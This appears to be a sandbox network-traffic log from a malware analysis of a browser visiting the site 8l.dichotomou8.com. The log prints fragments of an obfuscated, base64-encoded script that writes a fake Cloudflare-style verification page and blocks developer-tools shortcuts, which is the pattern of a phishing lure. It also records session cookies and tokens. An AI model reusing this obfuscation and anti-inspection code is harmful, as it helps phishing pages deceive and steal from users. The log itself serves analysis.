                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6IldrakV1K0xtTmpBSUl6WWoyRGthVmc9PSIsInZhbHVlIjoiN0J1elFhN0VoU3FRMy9WWkVGM1lRekFCNTUwVnkwMFlVUnZOS3BUd21yRVFoYXRIdGR3T1ZmT3p0Ukh0QTd0ZmFvNWdHLzc5VXBLMitFSm5taVlYSHlJeXVGSitIQTkzcXVXNDVSV1RFVityVW5RMjhOTlpUUUxWbGYxVzlQbUQiLCJtYWMiOiI0YWU1ODI2OTdjNzhjY2E3NjI5NzRhMWRiMzc2NTE5ZjhiZTkxMzY0MWYxOTc1NDM0Zjg4YjVjNGUzM2I2NGYxIiwidGFnIjoiIn0%3D; expires=Tue, 11-Feb-2025 17:27:10 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                                            2025-02-11 15:27:11 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 70 4b 61 54 52 4f 51 31 5a 75 56 55 4e 76 61 55 59 77 64 44 52 4f 57 58 4a 36 53 56 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 51 58 4a 59 56 6c 68 68 5a 6a 41 34 4e 56 64 36 65 55 56 33 65 6e 56 30 57 6d 51 33 65 6b 74 55 54 46 4e 4c 52 6a 68 4f 54 55 4a 68 57 55 5a 4e 56 44 64 4c 55 6b 73 32 54 55 39 73 4d 55 78 4c 52 7a 45 32 64 58 4e 53 61 58 46 70 51 31 5a 35 4b 33 4a 7a 55 48 5a 7a 63 31 64 59 54 7a 56 73 61 32 46 68 52 30 78 4b 52 32 46 73 59 31 68 31 55 32 70 51 5a 44 42 4c 61 56 6c 6e 65 46 42 69 61 6a 5a 6e 59 7a 52 35 57 54 5a 49 4b 7a 56 48 55 6c 4a 61 64 33 56 6b 4e 31 68 54 54 48 6c 75 54 6d 74 56 63 6d 4a 55 64 57 73
                                                                                                                                                                                                                            Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImpKaTROQ1ZuVUNvaUYwdDROWXJ6SVE9PSIsInZhbHVlIjoiQXJYVlhhZjA4NVd6eUV3enV0WmQ3ektUTFNLRjhOTUJhWUZNVDdLUks2TU9sMUxLRzE2dXNSaXFpQ1Z5K3JzUHZzc1dYTzVsa2FhR0xKR2FsY1h1U2pQZDBLaVlneFBiajZnYzR5WTZIKzVHUlJad3VkN1hTTHluTmtVcmJUdWs
                                                                                                                                                                                                                            2025-02-11 15:27:11 UTC1369INData Raw: 36 36 61 66 0d 0a 3c 73 63 72 69 70 74 3e 0a 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 34 54 43 35 6b 61 57 4e 6f 62 33 52 76 62 57 39 31 4f 43 35 6a 62 32 30 76 59 6c 46 77 54 32 46 6b 5a 55 31 76 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 43 6a 78 6f 64 47 31 73 50 67 6f 38 61 47 56 68 5a 44 34 4b 49 43 41 67 49 44 78 73 61 57 35 72 49 48 4a 6c 62 44 30 69 61 57 4e 76 62 69 49 67 61 48 4a 6c 5a 6a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6b 5a 58 5a 6c 62 47 39 77 5a 58 4a 7a 4c 6d 4e 73 62 33 56 6b 5a 6d 78 68 63
                                                                                                                                                                                                                            Data Ascii: 66af<script>if(atob("aHR0cHM6Ly84TC5kaWNob3RvbW91OC5jb20vYlFwT2FkZU1vLw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhc
                                                                                                                                                                                                                            2025-02-11 15:27:11 UTC1369INData Raw: 39 50 54 30 67 4e 7a 51 70 49 48 78 38 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 55 70 49 48 78 38 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 49 70 49 48 78 38 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 31 6c 64 47 46 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 59 57 78 30 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44
                                                                                                                                                                                                                            Data Ascii: 9PT0gNzQpIHx8CiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzUpIHx8CiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzIpIHx8CiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQuYWx0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09ID
                                                                                                                                                                                                                            2025-02-11 15:27:11 UTC1369INData Raw: 62 69 35 71 63 79 49 2b 50 43 39 7a 59 33 4a 70 63 48 51 2b 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 61 47 46 73 62 47 56 75 5a 32 56 7a 4c 6d 4e 73 62 33 56 6b 5a 6d 78 68 63 6d 55 75 59 32 39 74 4c 33 52 31 63 6d 35 7a 64 47 6c 73 5a 53 39 32 4d 43 39 68 63 47 6b 75 61 6e 4d 2f 62 32 35 73 62 32 46 6b 50 57 39 75 62 47 39 68 5a 46 52 31 63 6d 35 7a 64 47 6c 73 5a 55 4e 68 62 47 78 69 59 57 4e 72 49 6a 34 38 4c 33 4e 6a 63 6d 6c 77 64 44 34 4b 49 43 41 67 49 44 78 7a 59 33 4a 70 63 48 51 67 63 33 4a 6a 50 53 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 4e 6b 62 6d 70 7a 4c 6d 4e 73 62 33 56 6b 5a 6d 78 68 63 6d 55 75 59 32 39 74 4c 32 46 71 59 58 67 76 62 47 6c 69 63 79 39 6a 63 6e 6c 77 64 47 38
                                                                                                                                                                                                                            Data Ascii: bi5qcyI+PC9zY3JpcHQ+CiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jaGFsbGVuZ2VzLmNsb3VkZmxhcmUuY29tL3R1cm5zdGlsZS92MC9hcGkuanM/b25sb2FkPW9ubG9hZFR1cm5zdGlsZUNhbGxiYWNrIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9jcnlwdG8
                                                                                                                                                                                                                            2025-02-11 15:27:11 UTC1369INData Raw: 6d 39 75 64 43 31 33 5a 57 6c 6e 61 48 51 36 4e 44 41 77 4f 79 31 33 5a 57 4a 72 61 58 51 74 5a 6d 39 75 64 43 31 7a 62 57 39 76 64 47 68 70 62 6d 63 36 59 57 35 30 61 57 46 73 61 57 46 7a 5a 57 51 37 5a 6d 39 75 64 43 31 7a 64 48 6c 73 5a 54 70 75 62 33 4a 74 59 57 77 37 66 51 70 77 65 33 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 59 32 56 75 64 47 56 79 4f 33 30 4b 63 48 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 4d 6a 42 77 65 44 74 6d 62 32 35 30 4c 58 64 6c 61 57 64 6f 64 44 6f 30 4d 44 41 37 62 57 46 79 5a 32 6c 75 4f 6a 68 77 65 43 41 77 4f 33 30 4b 49 32 4e 76 62 6e 52 6c 62 6e 52 37 59 57 78 70 5a 32 34 74 61 58 52 6c 62 58 4d 36 59 32 56 75 64 47 56 79 4f 32 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 59 32 39 73 62 33 49 36 49 32 5a 68 5a 6d 46 6d
                                                                                                                                                                                                                            Data Ascii: m9udC13ZWlnaHQ6NDAwOy13ZWJraXQtZm9udC1zbW9vdGhpbmc6YW50aWFsaWFzZWQ7Zm9udC1zdHlsZTpub3JtYWw7fQpwe3RleHQtYWxpZ246Y2VudGVyO30KcHtmb250LXNpemU6MjBweDtmb250LXdlaWdodDo0MDA7bWFyZ2luOjhweCAwO30KI2NvbnRlbnR7YWxpZ24taXRlbXM6Y2VudGVyO2JhY2tncm91bmQtY29sb3I6I2ZhZmFm
                                                                                                                                                                                                                            2025-02-11 15:27:11 UTC1369INData Raw: 6f 75 4d 33 4d 37 66 51 6f 6a 63 33 56 6a 59 32 56 7a 63 79 31 77 63 6d 55 74 61 58 74 6f 5a 57 6c 6e 61 48 51 36 4d 7a 42 77 65 44 74 33 61 57 52 30 61 44 6f 7a 4d 48 42 34 4f 33 30 4b 49 33 4e 31 59 32 4e 6c 63 33 4d 74 63 48 4a 6c 4c 57 6b 67 62 47 6c 75 5a 58 74 7a 64 48 4a 76 61 32 55 36 49 7a 41 7a 4f 44 45 79 4e 7a 74 68 62 6d 6c 74 59 58 52 70 62 32 34 36 5a 6d 6c 79 5a 58 64 76 63 6d 73 67 4c 6a 4e 7a 49 47 56 68 63 32 55 74 62 33 56 30 49 44 45 37 63 33 52 79 62 32 74 6c 4c 58 64 70 5a 48 52 6f 4f 6a 45 37 63 33 52 79 62 32 74 6c 4c 57 52 68 63 32 68 68 63 6e 4a 68 65 54 6f 7a 4d 69 41 7a 4d 6a 74 7a 64 48 4a 76 61 32 55 74 5a 47 46 7a 61 47 39 6d 5a 6e 4e 6c 64 44 6f 74 4f 44 74 39 43 69 4e 7a 64 57 4e 6a 5a 58 4e 7a 4c 58 52 6c 65 48 52 37 59
                                                                                                                                                                                                                            Data Ascii: ouM3M7fQojc3VjY2Vzcy1wcmUtaXtoZWlnaHQ6MzBweDt3aWR0aDozMHB4O30KI3N1Y2Nlc3MtcHJlLWkgbGluZXtzdHJva2U6IzAzODEyNzthbmltYXRpb246ZmlyZXdvcmsgLjNzIGVhc2Utb3V0IDE7c3Ryb2tlLXdpZHRoOjE7c3Ryb2tlLWRhc2hhcnJheTozMiAzMjtzdHJva2UtZGFzaG9mZnNldDotODt9CiNzdWNjZXNzLXRleHR7Y
                                                                                                                                                                                                                            2025-02-11 15:27:11 UTC1369INData Raw: 79 4b 44 45 73 4d 53 77 77 4c 44 45 70 49 43 34 30 63 79 42 69 59 57 4e 72 64 32 46 79 5a 48 4d 37 66 51 6f 75 59 32 49 74 59 33 74 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 70 6a 5a 57 35 30 5a 58 49 37 59 33 56 79 63 32 39 79 4f 6e 42 76 61 57 35 30 5a 58 49 37 5a 47 6c 7a 63 47 78 68 65 54 70 6d 62 47 56 34 4f 32 31 68 63 6d 64 70 62 69 31 73 5a 57 5a 30 4f 6a 45 32 63 48 67 37 64 47 56 34 64 43 31 68 62 47 6c 6e 62 6a 70 73 5a 57 5a 30 4f 33 30 4b 4c 6d 4e 69 4c 57 78 69 65 32 52 70 63 33 42 73 59 58 6b 36 5a 33 4a 70 5a 44 74 77 62 47 46 6a 5a 53 31 70 64 47 56 74 63 7a 70 6a 5a 57 35 30 5a 58 49 37 66 51 6f 75 59 32 49 74 62 47 49 67 61 57 35 77 64 58 52 37 59 33 56 79 63 32 39 79 4f 6e 42 76 61 57 35 30 5a 58 49 37 5a 33 4a 70 5a 43 31 68 63 6d
                                                                                                                                                                                                                            Data Ascii: yKDEsMSwwLDEpIC40cyBiYWNrd2FyZHM7fQouY2ItY3thbGlnbi1pdGVtczpjZW50ZXI7Y3Vyc29yOnBvaW50ZXI7ZGlzcGxheTpmbGV4O21hcmdpbi1sZWZ0OjE2cHg7dGV4dC1hbGlnbjpsZWZ0O30KLmNiLWxie2Rpc3BsYXk6Z3JpZDtwbGFjZS1pdGVtczpjZW50ZXI7fQouY2ItbGIgaW5wdXR7Y3Vyc29yOnBvaW50ZXI7Z3JpZC1hcm
                                                                                                                                                                                                                            2025-02-11 15:27:11 UTC1369INData Raw: 49 47 35 76 64 33 4a 68 63 44 74 77 62 47 46 6a 5a 53 31 6a 62 32 35 30 5a 57 35 30 4f 6d 4e 6c 62 6e 52 6c 63 69 42 6d 62 47 56 34 4c 57 56 75 5a 44 74 39 43 69 4e 30 5a 58 4a 74 63 33 74 6a 62 32 78 76 63 6a 6f 6a 4d 6a 4d 79 4d 7a 49 7a 4f 32 52 70 63 33 42 73 59 58 6b 36 61 57 35 73 61 57 35 6c 4c 57 5a 73 5a 58 67 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 68 77 65 44 74 6d 62 32 35 30 4c 58 4e 30 65 57 78 6c 4f 6d 35 76 63 6d 31 68 62 44 74 71 64 58 4e 30 61 57 5a 35 4c 57 4e 76 62 6e 52 6c 62 6e 51 36 5a 6d 78 6c 65 43 31 6c 62 6d 51 37 62 47 6c 75 5a 53 31 6f 5a 57 6c 6e 61 48 51 36 4d 54 42 77 65 44 74 39 43 69 4e 30 5a 58 4a 74 63 79 41 75 62 47 6c 75 61 79 31 7a 63 47 46 6a 5a 58 4a 37 62 57 46 79 5a 32 6c 75 4f 6a 41 67 4c 6a 4a 79 5a 57 30
                                                                                                                                                                                                                            Data Ascii: IG5vd3JhcDtwbGFjZS1jb250ZW50OmNlbnRlciBmbGV4LWVuZDt9CiN0ZXJtc3tjb2xvcjojMjMyMzIzO2Rpc3BsYXk6aW5saW5lLWZsZXg7Zm9udC1zaXplOjhweDtmb250LXN0eWxlOm5vcm1hbDtqdXN0aWZ5LWNvbnRlbnQ6ZmxleC1lbmQ7bGluZS1oZWlnaHQ6MTBweDt9CiN0ZXJtcyAubGluay1zcGFjZXJ7bWFyZ2luOjAgLjJyZW0
                                                                                                                                                                                                                            2025-02-11 15:27:11 UTC1369INData Raw: 6d 39 72 5a 54 6f 6a 5a 6a 68 6d 4f 47 59 34 4f 33 4e 30 63 6d 39 72 5a 53 31 74 61 58 52 6c 63 6d 78 70 62 57 6c 30 4f 6a 45 77 4f 32 46 75 61 57 31 68 64 47 6c 76 62 6a 70 7a 59 32 46 73 5a 53 41 75 4d 33 4d 67 5a 57 46 7a 5a 53 31 70 62 69 31 76 64 58 51 67 4c 6a 6c 7a 49 47 4a 76 64 47 67 37 66 51 6f 75 59 32 49 74 59 32 39 75 64 47 46 70 62 6d 56 79 65 32 46 73 61 57 64 75 4c 57 6c 30 5a 57 31 7a 4f 6d 4e 6c 62 6e 52 6c 63 6a 74 6b 61 58 4e 77 62 47 46 35 4f 6d 64 79 61 57 51 37 5a 32 46 77 4f 6a 45 79 63 48 67 37 5a 33 4a 70 5a 43 31 30 5a 57 31 77 62 47 46 30 5a 53 31 6a 62 32 78 31 62 57 35 7a 4f 6a 4d 77 63 48 67 67 59 58 56 30 62 7a 74 74 59 58 4a 6e 61 57 34 74 62 47 56 6d 64 44 6f 78 4e 6e 42 34 4f 33 30 4b 4c 6d 78 76 5a 32 38 74 64 47 56 34
                                                                                                                                                                                                                            Data Ascii: m9rZTojZjhmOGY4O3N0cm9rZS1taXRlcmxpbWl0OjEwO2FuaW1hdGlvbjpzY2FsZSAuM3MgZWFzZS1pbi1vdXQgLjlzIGJvdGg7fQouY2ItY29udGFpbmVye2FsaWduLWl0ZW1zOmNlbnRlcjtkaXNwbGF5OmdyaWQ7Z2FwOjEycHg7Z3JpZC10ZW1wbGF0ZS1jb2x1bW5zOjMwcHggYXV0bzttYXJnaW4tbGVmdDoxNnB4O30KLmxvZ28tdGV4
                                                                                                                                                                                                                            2025-02-11 15:27:11 UTC1369INData Raw: 56 34 63 47 6c 79 5a 57 51 74 59 32 6c 79 59 32 78 6c 4c 43 35 30 61 47 56 74 5a 53 31 68 64 58 52 76 49 43 35 30 61 57 31 6c 62 33 56 30 4c 57 4e 70 63 6d 4e 73 5a 58 74 7a 64 48 4a 76 61 32 55 74 5a 47 46 7a 61 47 46 79 63 6d 46 35 4f 6a 45 32 4e 6a 74 7a 64 48 4a 76 61 32 55 74 5a 47 46 7a 61 47 39 6d 5a 6e 4e 6c 64 44 6f 78 4e 6a 59 37 63 33 52 79 62 32 74 6c 4c 58 64 70 5a 48 52 6f 4f 6a 49 37 63 33 52 79 62 32 74 6c 4c 57 31 70 64 47 56 79 62 47 6c 74 61 58 51 36 4d 54 41 37 63 33 52 79 62 32 74 6c 4f 69 4d 35 4f 54 6b 37 5a 6d 6c 73 62 44 6f 6a 4f 54 6b 35 4f 33 30 4b 4c 6e 52 6f 5a 57 31 6c 4c 57 46 31 64 47 38 67 49 32 56 34 63 47 6c 79 5a 57 51 74 61 53 77 75 64 47 68 6c 62 57 55 74 59 58 56 30 62 79 41 6a 64 47 6c 74 5a 57 39 31 64 43 31 70 65
                                                                                                                                                                                                                            Data Ascii: V4cGlyZWQtY2lyY2xlLC50aGVtZS1hdXRvIC50aW1lb3V0LWNpcmNsZXtzdHJva2UtZGFzaGFycmF5OjE2NjtzdHJva2UtZGFzaG9mZnNldDoxNjY7c3Ryb2tlLXdpZHRoOjI7c3Ryb2tlLW1pdGVybGltaXQ6MTA7c3Ryb2tlOiM5OTk7ZmlsbDojOTk5O30KLnRoZW1lLWF1dG8gI2V4cGlyZWQtaSwudGhlbWUtYXV0byAjdGltZW91dC1pe


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            6192.168.2.64974140.113.110.67443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-02-11 15:27:12 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 45 6c 7a 64 44 42 69 50 68 6b 4f 31 46 64 6a 4e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 35 32 36 30 37 64 65 62 63 34 31 66 33 36 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 304MS-CV: ElzdDBiPhkO1FdjN.1Context: 952607debc41f36
                                                                                                                                                                                                                            2025-02-11 15:27:12 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                            2025-02-11 15:27:12 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 45 6c 7a 64 44 42 69 50 68 6b 4f 31 46 64 6a 4e 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 35 32 36 30 37 64 65 62 63 34 31 66 33 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 34 57 66 47 6c 32 58 49 35 78 72 43 43 49 72 79 6f 38 59 4d 57 42 67 62 69 6b 7a 4b 30 72 32 36 48 5a 55 42 39 71 70 64 33 5a 58 76 7a 56 7a 48 33 2b 76 52 30 73 33 41 39 6e 54 52 70 50 73 5a 61 66 63 77 77 63 68 78 72 76 4b 76 67 39 58 2b 34 43 63 4a 66 6a 56 41 66 4f 42 55 6d 6d 50 74 44 48 69 72 34 30 51 6e 67 55 50 6c 79
                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: ElzdDBiPhkO1FdjN.2Context: 952607debc41f36<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAT4WfGl2XI5xrCCIryo8YMWBgbikzK0r26HZUB9qpd3ZXvzVzH3+vR0s3A9nTRpPsZafcwwchxrvKvg9X+4CcJfjVAfOBUmmPtDHir40QngUPly
                                                                                                                                                                                                                            2025-02-11 15:27:12 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 45 6c 7a 64 44 42 69 50 68 6b 4f 31 46 64 6a 4e 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 35 32 36 30 37 64 65 62 63 34 31 66 33 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 196MS-CV: ElzdDBiPhkO1FdjN.3Context: 952607debc41f36<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                            2025-02-11 15:27:12 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                            2025-02-11 15:27:12 UTC58INData Raw: 4d 53 2d 43 56 3a 20 38 34 78 49 68 42 4b 4a 59 55 57 31 50 52 56 35 49 6c 51 57 6a 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                            Data Ascii: MS-CV: 84xIhBKJYUW1PRV5IlQWjg.0Payload parsing failed.


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            7192.168.2.649742151.101.130.1374436820C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-02-11 15:27:12 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                            Host: code.jquery.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                            Referer: https://8l.dichotomou8.com/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2025-02-11 15:27:12 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Content-Length: 89501
                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                            ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Date: Tue, 11 Feb 2025 15:27:12 GMT
                                                                                                                                                                                                                            Age: 3040719
                                                                                                                                                                                                                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740026-EWR
                                                                                                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                                                                                                            X-Cache-Hits: 2774, 460
                                                                                                                                                                                                                            X-Timer: S1739287633.535777,VS0,VE0
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            2025-02-11 15:27:12 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
